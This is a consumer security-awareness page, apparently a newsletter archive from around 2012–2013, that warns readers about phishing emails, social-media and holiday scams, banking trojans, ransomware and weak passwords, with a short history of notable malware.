American Airlines Confirmation
This interesting-looking message appeared in my
email Inbox this afternoon: 
It looks pretty legitimate,
but it's not. There have been a rash of these lately, including emails
about UPS delivery problems, and automated traffic camera speeding tickets.
It still amazes me how many people fall for the scams and follow the links.
What they will find is either a link to a website that does a drive-by
download of malware to their PC, or less creative scams that simply download
the malicious software directly.
Don't do it. Leave the link alone and don't click! Delete those messages immediately, and make sure to clean out the deleted messages folder.
Facebook Scams
Facebook is loved far
and wide by scammers. It's a great pool of an almost unlimited amount
of victims, most of whom are gullible enough to fall for the most simple
scams. Shooting fish in a barrel! Better yet, a bunch of these Facebook
users are "endorsing" the scam giving it even more credibility. Incredible
isn't it? Most
people think of Facebook as this secure, walled garden where nothing bad
can happen because Zuck is watching out for you. Think again. There are
several different categories of scams out there lying in wait. Many of
these are recycled with small updates on a regular basis. Here are the
different scam flavors:
| Account related scams | Free stuff from third parties |
| Benefit from (fake) news | Curiosity Traps |
Facebook changes its look and functionalities often, but a lot of users dislike any kind of change. This normal human tendency is often misused by scammers who offer bogus Facebook Timeline deactivation options. An even greater number of scams targets those who aren't satisfied with features offered by the social network and are tricked into believing that there are ways to add functionalities such as the ability to view who checks out their profile more often, view who has deleted or unfollowed them, to see how many hours they spent on Facebook, to post again their first post, to add a Dislike button, to change their Facebook color theme, and even to add a Facebook security app to guard their accounts or to try a Facebook 2013 Demo app.
Next we have the scams that profess that Facebook is giving out something for free: an official Facebook T-shirt or mug to celebrate the social network's birthday, the random $50,000 reward, free Facebook Credits, or even a free mobile recharge. Lastly, there are scams that try to scare users into doing something because Facebook is closing all accounts, will close theirs because of overpopulation, will start charging users, or the Facebook Security Team will suspend their page.It's also good to know that Facebook-themed scams - and especially phishing attempts and malware-infection attempts - can often come in the form of fake Facebook notification emails - password change notifications, account cancellation (or deactivation) warnings, offensive comment notices, friend requests, and so on.
Facebook has come out with something new, and you always need to watch it when that happens. It's a combination of big data and social networking so that people can easily find new friends, dates, customers or business partners. In short, it's more or less a search engine that allows you to track down Facebook users that meet the criteria you specify. With all that personally relevant data at hand, this new Graph Search function is a bonanza for social engineers that now can manipulate you even easier and/or send spear-phishing attacks. This data can be used in a variety of scams. They are currently beta testing and are planning to release it this summer. The only thing I can say is that it is more important than ever to THINK BEFORE YOU CLICK, and get some very good security awareness training. Read the story below about the types of Facebook hacks you (and your employees) need to watch out for.
MSN/Hotmail Scam
It's a new year and
we'd like to think that users are getting smarter about clicking on phishing
links and not fall for recycled tricks by cyber criminals. Unfortunately,
there is a new attack this week that's been used before but people are
still falling for it in droves.
This is the attack, an email which claims to come from the "Windows Live Team" and warns Hotmail/MSN users that their account is at risk of immediate closure after different computers logged into it, and multiple attempts were made to guess the password.
The email, which has the subject line "CONFIRMATION ALERT RESET (2013)" and comes from an unofficial-looking @msn.com email address, urges the user to reply via email with their full name, username, password, date of birth, and country in order to confirm their identity.
Alert your friends about this, and continue to warn them they should NEVER give login information to ANYONE.
Eurograbber steals 36 million €
If cybercrime would
be promoting their malware, for sure they would call their EuroGrabber
'next-generation' Zeus crimeware. This is (a lot) more than your run-of-the-mill
banking Trojan. These guys have penetrated SMS-based 2-factor authentication
and are exploiting it at full speed, Check Point Software Ltd intrusion
prevention product manager Darrell Burkey announced. What's most concerning,
as per Burkey, is how smart the criminals engineered this malware. "The
attack specifically targeted a certain type of authentication," he stated.
The new version has already stolen more than 36 million Euros ($47 million
U.S) from roughly 30,000 accounts at European banks, both consumer and
corporate users, performing automatic transfers that varied from €500€
to €250,000 to intermediary accounts controlled by members of the gang.
First you have to understand that mobile authentication is used all over in Europe for bank transactions, and that U.S. banks are moving into the same direction for some services. The Eurograbber attack first infects a user's PC with a banking Trojan, using social engineering and next it infects the user's mobile device with a second social engineering trick, when the user is fooled again into clicking on a link that now infects their phone.
When a user with an infected machine visits a banking site, the malware intercepts the session and injects a JavaScript onto the page. The user is notified of a "security upgrade," which involves providing cell phone information. When the cyberthieves send a confirmation message to the phone, it asks users to click on a link that actually infects the phone.
The malware targets the Android and Blackberry platforms, and has not been spotted on the iPhone yet. Originally, the attacks were first reported in Italy, and then bank customers saw the same exploit pop up in Germany, Holland and Spain after the cyber gang had done their translations, testing and quality assurance.
What you may not be aware of that in Eastern Europe, there are some people that go to work at 9 in the morning, punch the time clock, have lunch, leave the office at five and get health insurance, but what they do during the day is develop and test malware for criminal use. There are several competing criminal software companies out there, trying to outdo each other in creating the most advanced banking trojans.
"This attack meets all the key buzzwords we hear about attacks today," Burkey says during an interview with BankInfoSecurity. "It's sophisticated in the way it goes about taking advantage of two-factor authentication. It's targeted. It's stealthy. And, unfortunately, it's successful." The exploit was first discovered in August by Versafe, an online identity-theft protections provider. The command-and-control servers have been taken down at the moment, but this could easily be repeated.
Now, how can these attacks be prevented? The bad guys go after the weak link in IT security: the human. That means they send well-crafted emails that make people click because they either think they get something for free, or try to prevent a negative consequence. There are thousands of ways that the bad guys can trick someone, and only one way to prevent an attack from happening: security awareness training which will arm both consumers and organizations against increasingly sophisticated malware attacks.
You Accessed Illegal Content
There is a significant
uptick in a ransomware attack that declares a law enforcement agency has
determined that a computer with the victim's IP address has accessed child
pornography and other illegal content.
Moreover, this scam uses the good name of the Internet Crime Complaint Center (IC3) to lure the victim to a drive-by download website, which in turn installs the ransomware on the victim's computer, and tries to extort money.
As you well know, cyber criminals use social engineering to make people click on links to 'prevent a negative consequence'. To trick users to click this latest version of the malware claims that the victim's computer activity is being recorded using audio, video, and other devices.
We strongly recommend you warn your friends and co-workers about this one, as they can be hit both in the office and at home.
The Huge Damage That ONE Click Can Cause - Please Read!
In August 2012, one
malicious email opened by an employee of the South Carolina Department
of Revue caused a massive cyberattack - theft of 3.8 million tax returns,
Social Security numbers of 1.9 million people, access to data on 699,900
business tax returns and 3.3 million bank accounts. Attacks like this
could have been be prevented by training ourselves not to fall for attacks
by hackers using phishing emails.
An international hacker sent a few South Carolina Department of Revenue employees a phishing email. Unfortunately, one employee unknowingly clicked on the link. From that one click, the cybercriminal was able to steal the employee's user name and password. For weeks after, the cybercriminal started copying large amounts of information and transferring them onto zip files that were transferred outside of the system.
Apple Invoices
As predicted, holiday
scams are at an all-time high. Here is the best example: fake Apple invoices
being sent in high volume that claim you have been charged for a large
purchase from Apple. If you click on these, they lead to the Blackhole
exploit kit that drains your bank account. There are some other innovative
attacks doing the rounds too:
1) FDIC spamvertising with 'Your activity is discontinued', tricking users into believing that their ability to send Domestic Wire Transfers is disabled
2) Twitter attacks getting more subtle, where you first need to open the mentioned account to get the payload
3) Tsunami spam that 'warns' users and tells them to click on a link to see the video
4) More Twitter scams that they are going to start charging for their up to now free service.
Top
10 Holiday Scams
We recommend you mention
this to your friends and family as the bad guys are coming out in full
force this holiday season and will try to trick and scam users both at
the office and at their house.
10 'The Charity Tricksters': The holidays are traditionally the time for giving. It's also the time that cyber criminals try to pry money out of people that mean well. But making donations to the wrong site could mean you are funding cybercrime or even terrorism. So, watch out for any communications from charities that ask for your contribution, (phone, email, text, tweets, snail mail and even people ringing your door bell) and make sure they are legit and show their ID. It is safest to only donate to charities you already know, and refuse all the rest.
9 'The Grinch E-Card Greetings': Happy Holidays! Your email has an attachment that looks like an e-greeting card, pretty pictures and all. You think that this must be from a friend. Nope, not so. Malicious e-cards are sent by the millions, and especially at the office, never open these things as they might infect your workstation.
8 'The Fake Gift Card Trick': Internet crooks promote a fake gift card through social media but what they really are after is your information, which they then sell to other cyber criminals who use it for identity theft. Here is an example: A recent Facebook scam offered a "free $1,000 Best Buy gift card" to the first 20,000 people who signed up for a Best Buy fan page, which was a malicious copy of the original.
7 'The Copied Site': Bad guys build complete copies of well-known sites, send you emails promoting great deals, sell products, take the credit card, but never deliver the goods. These sites live only a few days and the money usually goes abroad. Your credit card company will refund the purchase, but apart from not getting your gift(s) your card number is now compromised and will be sold and used by cyber criminals. Always check for the https:// rather than just http:// .
6 'The DM-Scam': You tweet about a holiday gift you are trying to find, and you get a direct message (DM) from another twitter user offering to sell you one. Stop - Look - Think, because this could very well be a sophisticated scam. If you do not know that person, be -very- careful before you continue and never pay up front.
5 'The Extra Holiday-money Fraud': You always need some extra money during this season, so cyber fraudsters are offering work-from-home scams. The most innocent of these make you fill out a form where you give out confidential information like your Social Security number which will get your identity stolen. The worst of them offer you work where you unwittingly launder money from a cyberheist which can get you into major trouble.
4 'The Fake Recession Relief': Internet swindlers target people that are vulnerable due to the recession with pay-in-advance scams and credit offers. Spam emails advertise "prequalified, super low-interest" credit cards and loans if you pay a processing fee, which goes straight into the scammer's pocket.
3 'The Search Term Trap': Bad guys do their research and find out what people want. They then build a site that professes to have the item. They push that site high onto the search engines and you might click on that link. But the site contains malware and will infect your PC. Make sure that your web-browser is fully updated, and will warn you if it sees that the site is unsafe.
2 'The Evil Wi-Fi Twin': You bring your laptop and go to the mall to scout for gifts. Then you check if you get it cheaper somewhere online. But the bad guys are there too, shopping for your credit card number! They put out a Wi-Fi signal that looks just like a free one you always use. Choose the wrong Wi-Fi and the hacker now sits in the middle and steals your credit card data while you buy online. When you use a Wi-Fi connection in a public place, it is better not to use your credit card.
1 'The Black Friday Racket': Black Friday is the start of great holiday shopping deals, unless they are too good to be true and you get tricked into buying an iPad for a 90% discount. Be extra careful with online buying starting the day after Thanksgiving!
Stolen
Election!
Watch out for a scam
wave starting today: Elections. Apart from hurricane Sandy scams, with
the race being in a dead heat, you can now expect attacks related to the
U.S. elections from today forward. Recently in Venezuela, there were successful
phishing attacks using "the election was stolen" as bait.
And as always, the scammers jumped on Hurricane Sandy and started spewing various spam and phishing attacks promising everything from help with insurance claims, disaster relief for people and pets, restaurant deals, gas discount coupons, and even web pages where they can "win" Apple products.
Watch it with these Apple scams, because they ask for a lot of personal information, including your cell phone number, which they can use to initiate premium-rate SMS charges you get billed for. We recommend you forward this warning to your employees.
20
Notorious worms, viruses and botnets
- The first real computer virus, Creeper was released "in lab" in 1971 by an employee of a company working on building ARPANET, the Internet’s ancestor, according to Guillaume Lovet, Senior Director, FortiGuard Labs.The Creeper looked for a machine on the network, transferred to it, displayed the message “I’m the creeper, catch me if you can!” and started over, thereby hopping from system to system.
- Elk Cloner: Written in 1982 "by a 15-year old as a way to booby trap his friends' Apple II computer systems without physical access to them, Elk Cloner spread via floppy disks," according to FortiGuard Labs's Lovet. "Infected machines displayed a harmless poem, dedicated to the virus' glory."
- Morris worm: Chris Larsen, Malware Lab Architect for Blue Coat Systems, points to the Morris worm, created in 1988 by Cornell University student Robert Tappan Morris, as the first internet worm. "It's the one that got everyone's attention and demonstrated the possibility of computer malware for causing chaos," adds Kevin Haley, Director, Symantec Security Response.
- Michelangelo: The dormant Michelangelo virus was designed to awaken in 1991 on March 6th, the birthday of Renaissance artist Michelangelo, and erase critical parts of infected computers’ hard drives, says Lovet. "The promises of destruction it carried spawned a media frenzy. In the weeks preceding March 6th, media relayed, and some may say amplified, experts’ predictions forecasting 5 million computers going definitively down. Yet, on March 6th, only a few thousand data losses were reported – and public trust in AV companies’ ethics was tainted for a while."
- Melissa: The Melissa virus, found in 1999, propagated via infected Microsoft Word documents and mailed itself to Outlook contacts of the contaminated user, explains Lovet. It was virulent enough to paralyze some important mailing systems on the Internet. Its author created the bug to honor Melissa, a stripper he’d met in Florida. "Whether he conquered her heart this way is somewhat unlikely, but one thing is sure: the malicious code earned him 20 months in jail and a $5,000 fine," says Lovet.
- I Love You: Discovered in 2000, the "I love you" or "Love Letter" malware was not the first example of using social engineering to infect computers, but it was the first massively successful one," says Haley. Subsequently, it provided a foundation for cyber social engineering that still works today: everyone wants to know that someone loves them. On the flip side, it also taught computer users that they can't trust everything they see online or receive in their inbox. (Though that lesson clearly hasn't settled in fully.)
- In 2001, the Anna Kournikova virus spread like wildfire via emails promising a picture of the tennis star. This proved that just like in advertising, when it comes to social engineering, sex sells.
- Code Red: In 2001, Code Red infected Web servers, where it automatically spread by exploiting a vulnerability in Microsoft IIS servers, says Lovet. "In less than one week, nearly 400,000 servers were infected, and the homepage of their hosted Websites was replaced with 'Hacked By Chinese!'" Lovet also notes Code Red had a distinguishing feature designed to flood the White House Website with traffic from the infected servers, probably making it the first case of documented hacktivism on a large scale.
- SQLslammer made the rounds in 2003. The worm reportedly infected every system vulnerable to the attack within a mere 15 minutes, according to Symantec. It caused a denial of service on some Internet hosts and dramatically slowed down general Internet traffic, spreading rapidly and infecting most of its 75,000 victims within ten minutes. "No one had ever seen malware spread at those speeds before".
- In 2004, Sasser malware exploited a vulnerability in Microsoft Windows to propagate, which made it particularly virulent. What’s more, due to a bug in the worm’s code, infected systems turned off every couple of minutes, says Lovet. More than one million systems were infected, AFP’s communications satellites were interrupted for hours, Delta Airlines was forced to cancel flights, the British coast guard had to go back to print maps, and a hospital had to redirect its emergency room because its radiology department was completely paralyzed by the virus. The damage amount was estimated to be more than $18 billion. Microsoft placed a $250,000 bounty on the author’s head, who turned out to be an 18-year old German student.
- Mytob: One of first pieces of malware to combine the features of a bot and a mass-mailer, 2005's MyTob marked the beginning of the era of botnets and of cybercrime. Business models designed to monetize the many botnets began to appear: installation of spyware, dispersal of spam, illegal content hosting, interception of banking credentials, blackmail, etc. Today the revenue generated from botnets (some of which may number 20 million machines) is by some estimates several billion dollars per year.
- Storm botnet: By 2007, cybercriminals already had lucrative business models in place. Before then, however, botnets were fairly fragile: By neutralizing its unique Control Center, a botnet could be completely neutralized, because the bots no longer had anyone to report to or take commands from. By implementing a peer-to-peer architecture, Storm became the first botnet with decentralized command. At the peak of the epidemic, Storm had infected up to 50 million systems and accounted for 8 percent of all malware running in the world.
- Koobface: (an anagram for Facebook) made headlines in 2008. "It spread by pretending to be the infected user on social networks, prompting friends to download an update to their Flash player in order to view a video. The update is a copy of the virus".
- Zeus botnet: Blue Coat Systems, points to Zeus, first discovered in 2007, as the "king of the botnet kits." A malware platform unto itself that can be used to create a Trojan horse that steals banking information with man-in-the-browser keystroke logging and form grabbing, Zeus is spread mainly through drive-by downloads and phishing schemes.
- "Many people hadn't even heard of 'jailbreaking' a mobile device until the Ikee threat showed up (in 2009)," says Symantec. Affecting Apple's iPhone, the threat was rather harmless in payload, but it caught people's attention and demonstrated a couple of important facts: Mobile devices are simply computers and must be protected from cyber threats just like any other computer and like flies to honey, wherever you have a popular operating system, malware is sure to follow.
- Conficker: The massive number of machines infected by Conficker got everyone's attention. The real interesting thing about it, though, and what caused even more fear was the great unknown: What would happen when the resulting botnet woke up on a date specified in the threat's code. Fortunately, it did not live up to people's worst expectations.
- Operation Aurora: A cyber attack which began in mid-2009 and continued through December 2009, put the concept of advanced persistent threats on the map, according to researchers at Kaspersky Lab. The attack, first publicly disclosed by Google in a January 12, 2010 blog post, originated in China. The attacks, which hit more than 30 organizations in the U.S., were the first public confirmation that dedicated hackers had infiltrated major organizations and were using advanced techniques to stay undetected for long periods while stealing valuable information, including source code and intellectual property.
- The Flashback Trojan, discovered in 2011, affects computers running Mac OS X and exploits a security flaw in Java in order to install itself on Macs. Flashback is a "wake-up call for Mac users; no one should be feeling smug and safe these days."
- Stuxnet: Discovered in 2010, Stuxnet exploited several critical vulnerabilities in Windows which until then were unknown, including one guaranteeing its execution when inserting an infected USB key into the target system – even if a system's autorun capabilities were disabled. From the infected system, Stuxnet was then able to spread into an internal network, until it reached its target: an industrial control system manufacturered by Siemens. In this particular instance, Stuxnet knew the weak point with a specific controller – and most likely intended to destroy or neutralize the industrial system.
- Flame malware: "According to most threat researchers today, only governments have the necessary resources to design and implement a virus of such complexity". Flame mostly targeted computers in the Middle East. Analysis conducted in 2012 of servers used to control the Flame malware found several other related types of malware existed, including a direct connection to Stuxnet. Researchers with Kaspersky Lab, Symantec and others have found Flame is linked to a highly sophisticated operation in which a variety of defensive mechanisms were used to cover the attackers' tracks.
Is
Your Smartphone Spying On You?
For a few years now,
all smartphones sold in the United States have been required to be GPS-trackable,
ostensibly for lawful intercept purposes (though there's some vigorous
debate from privacy advocates whether that's always the case). That's
nothing new. But with a recent rash of ever-deeper-probing apps hitting
the streets, could your phone be co-opted in some other way to gather
information about you? The answer is yes, but the circumstances vary.
If law enforcement agencies get a court order, a more traditional wiretapping
scenario can be used whereby access to your conversations is achieved
for later use in court if it helps their case. But what about when surveillance
wades into legal gray areas: when surveillance techniques and/or software
enable you to be spied on without your knowledge? With the meteoric rise
in the popularity of smartphones, there has been a correspondingly steep
rise in the amount of apps that can do nifty things on your mobile device
-- things like tune your guitar, find a nearby Italian restaurant, or
locate the cheapest gas station near you.
To do many of the things you've grown to appreciate, your apps have access to information, such as your location. They also have access to your contacts (potentially), your usage history, and your always-on network connections. It's no surprise that parents are loading up their kids' smartphones with tracking apps, in case their little cherubs aren't where they say they are, and the grown-ups want a way to check up on them. But very similar technology could be used to check up on you, and you may not necessarily know what it's up to. For instance, a popular app for the Android platform claims to help track wayward spousal activity by tracking down voice conversations, location, and call history -- all tasks previously reserved for private investigators sipping stale coffee while staked out all night outside the target's apartment. Not anymore! Now there's an app for that.
What if you shut off your phone? That's no guarantee you can't be tracked. In years past, the FBI successfully prosecuted a crime boss based on a conversation recorded via his phone when it was “switched off.” The problem is that it's really tough to completely switch some smartphones off -- devilishly tough in some cases. You could pop the battery out, right? Well, on many iPhone and Android models, there really isn't a simple way to do that. And of course there are malicious apps that record your activity, in some cases recording the information you use in financial transactions and then spiriting the information out over the wireless network without you even noticing -- that is, until you get your bank statement a month later and notice strange purchases overseas in locations you've never visited.
I have a friend who refuses to get any modern phones because he's deliberately trying to opt out of mobile devices that have the ability to always know where he is. But, then, he isn't a Twitter junkie either, so it works for him. He says he's going analog in a digital world. Would that work for you? Maybe not, but it's getting increasingly difficult to fit into a technology-driven world and still retain your anonymity. If you want to give it a shot, try limiting the amount of time your network services are enabled to only when you need them. Also, restrict which apps you load to just what you really need. Using the “less is more” approach to apps will help.
It might also be a good idea to install security software that tells you when apps go rogue. Of course, you could always just use a landline phone to call people, but that's just way too old-fashioned for most of us these days.
Friday
is Phishing Day
Something that was
recently discovered is very troubling, and I thought you needed to be
alerted about it right away:
Websense reported on October 8, 2012 about their most recent July-August 2012 research. They said: "A disturbing new twist on targeted attacks has started to emerge this year that directly affects professionally managed networks. If we look at the days of the week when most phishing emails are sent, we notice a huge uptick in volume on Fridays, Sundays and Mondays. Most phishing emails are sent on Fridays, followed by Monday and Sunday. The bad guys have learned that they can evade email security measures by sending an email with a clean link on Friday or over the weekend - bypassing email URL scanning. Then, over the weekend they compromise the URL with malicious code. The top phishing days of the week (by percentage) are:
Friday (38.5%)
Monday (30%)
Sunday (10.9%)
Thursday (6.5%)
Tuesday (5.8%)
Wednesday (5.2%)
Saturday (3.2%)
A typical attack of this type would have the bad guy doing the following:
1) Find a URL that
can be easily compromised… but do nothing at that time. Leave it
'as is' for now.
2) Craft an email that will not trigger spam, AV or other security measures
based on its content, but include links to the currently 'safe' URL. Since
they typically pretend to be something legitimate, it is best to simply
copy a legitimate message… and only change one link to the 'safe'
URL.
3) Send the email over the weekend, or late at night, so email defenses
will approve the email and deliver it into the user's mailbox.
4) Just before you believe employees will begin accessing email, compromise
the URL and install that part of the attack strategy.
Evasion techniques
like these help when hackers are going for the big game - spear-phishing
employees with access to a specific network or data or whale phishing,
the targeting of executives at companies." The above new tactic shows
that it is more important than ever to step all employees through high-quality
security awareness training.
What you really should do now is start with our free Phishing Security
Test. Find out what percentage of your employees is Phish-prone!
Romney
Almost President
Remember that special
events like elections or natural disasters make the bad guys even more
active than normal. (Read 07/31/2012: Olympic Scams)
They use these events to social engineer people into clicking on links they normally would not. Politics is especially charged at the moment, so the new malicious email campaign that pretends to be from CNN is a good example. It announces breaking news about Romney, but it leads to a website with 'blackhole' malware which will infect their workstation.
Be especially wary during and -after- the election, where there will be allegations that "the election was stolen" and cybercrime will use election fraud as bait. I'm sure they are working on a campaign right now that will lie in wait until right after the election. No matter who wins, they will have phishing email ready to trap you. It just happened after the Venezuela elections.
The bad guys are getting more crafty by the month; when you visit the infected website with a hardened PC that is not able to pick up the infections they want to spread, they resort to a page that looks identical to the Adobe Flash Player download and tell you to download it, but it's of course a fake and will install a trojan instead of Flash.
Lol
is this your new profile pic?
You won't be laughing long if you click on the link that asks: "lol is
this your new profile pic?" That's the message being distributed among
Skype users, and it conceals malware that can harness your computer to
a botnet.
It's a form of phishing, of course, tempting Skype IM users to interact with what appears to be a cheerful and harmless greeting from a friend. The malicious content of the messages was discovered by cloud security vendor TrendMicro, which reported Monday that the malware was "spreading fast."
The payload contained in the message is the charmingly named Dorkbot worm. The symptoms of infection can be "nasty," ranging from locking you out of your computer and demanding a ransom, to stealing user names and passwords for Websites.
Skype has acknowledged the presence of the threat and is working to mitigate its effects. Meantime, it offers advice that should be obvious: "following links -- even when from your contacts -- that look strange or are unexpected is not advisable."
Surely we've all by now received completely uncharacteristic emails from friends who have had one of their accounts hacked. In most cases, these are obvious phishing attempts: Your aunt is unlikely to invite you to "Get a load of this deal." Or maybe she is, but you get my point.
Difficulty arises when neutral messages are received from recognized sources. Whether the Dorkbot IM fits this category depends, I suppose, on whether your friends are accustomed to beginning a sentence with "lol..." It's probably subtle enough to dupe many users, although it's currently unknown how many have fallen victim.
Another day, another threat. With Skype increasingly used as an enterprise tool, there are two takeaways for IT managers: Make sure employees are using the latest version of software like Skype, and reinforce the message that it's hard to automate solutions against phishing. User vigilance is the best defense.
Pay
Money to Get Money
If You Need to Pay Money to Get Money, You Have Been Scammed. These
scams are still very popular. The victim gets an email or text message
that they have won a large cash prize. Sometimes they add a PDF with a
picture of a fake check, and that they need to pay a small 'processing
fee' to get their hands on the full amount.
Often the cybercriminals use
the Publishers Clearing House brand for this scam. Since most of us are
aware of how the grand prize winner is notified in person with an oversize
check, scammers use a ploy that the victim is the runner-up of a smaller
cash prize, usually in the $300,000 range. When the victim responds, the
scammers next move is to send a snail mail with an enclosed fake check
- usually around $5,000 - with the instructions that the victim should
only deposit the check after(!) sending the $2,500 processing fee to an
address via Western Union.
When the victim gets notified by the bank that
the check they deposited is a fake, the scammers are long gone with the
$2,500. They move around and are hard to track down. Remember: If it is
too good to be true, it most likely is.
Changes to
Microsoft Services Agreement
This new official-looking email currently making the circuit claims to
be from Microsoft, but the links in it point to a webserver in Minsk,
Belarus (Microsoft is headquartered in Redmond, Washington). The links
may or may not take you to an assortment of prime Russian perfumes available
for purchase, but will probably also infect your PC with some nasty malware
as well. As always: don't fall for it. Delete the message from the Inbox,
and make sure you clean out your Deleted Messages folder as
well.
You
Have Been Targeted for Assassination
Yup, no kidding! Some
of the cybercrime gangs have pulled out all the stops and went into 'full
threat mode'. They actually have been at this for a while, and every month
they must be sitting down and decide what sort of stupid but scary threat
they will cook up now to keep their scam from "going stale".
The last few weeks, the Internet Crime Complaint Center (IC3) reported they received complaints about the latest version of 'Hit Man Scam' which now tells people via e-mail they have been targeted for assassination. The complainers told IC3 that the email wants them to buy a security alarm so they can use that if they see suspicious activity.
The e-mails were signed by Agent Bauer (remember "24" on TV?) of the fictional International Intelligence Bureau. It is always surprising how many people go into panic mode and start clicking on links to avoid a negative consequence.
While most people know such an email is a hoax, the scammers obviously find enough people that respond to make it worthwhile for them keep the scam going.
Easy
Password/PIN Hacking - courtesy of Forbes Magazine
If you see your password below, STOP and immediately go change
your password -- before you forget! You will probably make changes in
several places since passwords tend to be reused for multiple accounts.
Don't make it too easy to remember, because you are also making it too
easy for someone to guess. This is a chart of the 25 worst passwords
of 2011:
| password | 123456 | 12345678 | qwerty | abc123 |
| monkey | 1234567 | letmein | trustno1 | dragon |
| baseball | 111111 | iloveyou | master | sunshine |
| ashley | bailey | passwOrd | shadow | 123123 |
| 654321 | superman | qazwsx | michael | football |
This is a link to a Microsoft website that will rate your password strength.
Click
Here! It is always recommended that you do not use birthdays, kids
names, or pet names as passwords, and that you occasionally substitute
numbers, capital letters or special characters into your password to make
it stronger. For example, the password "wednesday" could be
strengthened into "Wedn3$day".
And just as bad are the weak PIN codes people often set on their ATM/debit/credit cards. If you were to happen to lose your card somewhere, these are the first combinations that a criminal would try to access your account. These are the 20 worst PIN code combinations:
| 1234 | 1111 | 0000 | 1212 | 7777 |
| 1004 | 2000 | 4444 | 2222 | 6969 |
| 9999 | 3333 | 5555 | 6666 | 1122 |
| 1313 | 8888 | 4321 | 2001 | 1010 |
Notably, the 22nd most common PIN code is "2580", which is the
middle column of buttons on most ATM keypads.
Two other scams are also worth mentioning. To start with, an email disguised
as a voicemail notification from Microsoft Exchange Server tries to get
users to double click a link to listen to the voicemail. The second one
is an email that appears to come from the FDIC and tries to get users
to follow a link to download "a new security version."
RedFlags (Adobe PDF)
A customer reported about a fresh scam. The bad guys are getting quite inventive, especially with big brands. They are now causing confusion using the UPS logo with a phishing attack on both employees and people at the house. Have you ever noticed that when people get confused, they go blank for a moment? That is what the phishers are consciously exploiting: "Did I really send something that day? Perhaps it was another day and they got it wrong? What -is- this?" ~CLICK~
Big brand hijacking is extremely popular with phishers these days. Be especially careful when you get emails that use the following brands: UPS, FedEx, Amazon, DHL, Verizon Wireless, Internal Revenue Service, Better Business Bureau, Bank of America, and Facebook. Just the FedEx brand alone is 'stolen' daily and used in 1-5 million (!) phishing emails.
Telemarketing scams come in waves. In the past it was time-share condos, but now we hear horror stories about boiler rooms pushing tech support. People get harassed with phone calls at the most inconvenient hours, posing as Microsoft employees and trying to scam you into some kind of PC security service, because your machine is infected with malware.
So, please let your friends know that phone scammers with foreign accents try to social engineer people to pay with credit cards and paypal for services that they don't need!
Olympic organizers recorded 124 different scams so far but expect double or more. First, there is an "Invitation FACEBOOK - Olympic Torch" chain letter. It claims that your machine will be infected with malware but the whole thing is a hoax. Think before you click and do not forward.
Next, scammers prey on Olympics Mobile game players. Not long ago, organizers of this year's Olympic Games released London 2012 - Official Mobile Game, a fun smartphone app for Android, iOS, and Blackberry users. But there are a few Russian websites claiming to be legitimate app markets and they host malware claiming to be the official London 2012 game. Be very careful downloading games for your smartphone.
Then, there is a blizzard of bogus Olympics-themed emails that try to steal money and/or information. They offer fake last-minute tickets, memorabilia, tell you that you have won an "Olympic lottery" or that you can sign up for temp jobs online and make some extra money. These scam emails use well known brands, or even spoof the London Olympics. Delete all of these immediately.
Especially do not click on any emails with pictures or videos about the Olympics, because clicking on one of these has a very high chance to infect your workstation with malware. Even search results on Google could be infected links so be careful.
Last but not least, be particularly wary of text messages on your phone, that claim a golden medal win, or something else 'exciting'. The safe way to get information about the Olympics online is to go their official website.
Beware, another honey trap is doing the rounds trying to snare people. This is something you could forward to all your friends as a good example of social engineering they should not fall for.
Russian online dating scammers are currently spamvertising a fraudulent campaign attempting to socially engineer users into interacting with a bogus online dating service. What we have here is a recent example of one of the most prolific online scams, namely, Russian dating scams. The scam orbits around on the notion that lonely Internet users will engage in emotional and financial transactions with complete strangers based on their profiles and associated photos promising love, marriage, or friendship. The idea is to have users click on the link to a webcam or other services, but clicking on links like that is fraught with all kinds of risk.